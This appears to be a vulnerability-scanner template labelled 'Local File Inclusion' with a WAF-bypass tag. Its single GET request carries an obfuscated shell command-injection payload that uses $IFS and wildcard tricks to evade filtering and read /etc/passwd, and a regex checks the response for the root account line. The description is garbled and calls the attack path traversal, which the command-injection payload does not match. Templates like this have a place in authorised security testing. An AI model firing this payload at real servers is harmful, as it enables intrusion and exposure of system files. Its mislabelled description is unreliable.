id: api-lfi1-waf

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     actionectory traversal via the GET /.. substring.

  tags: api,lfi1-waf

requests:
  - method: GET
    path:
      - "{{BaseURL}}/someparam?=cat$IFS$9$(PWD%%[a-z]*)e*c$(PWD%%[a-z]*)p?ss??"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

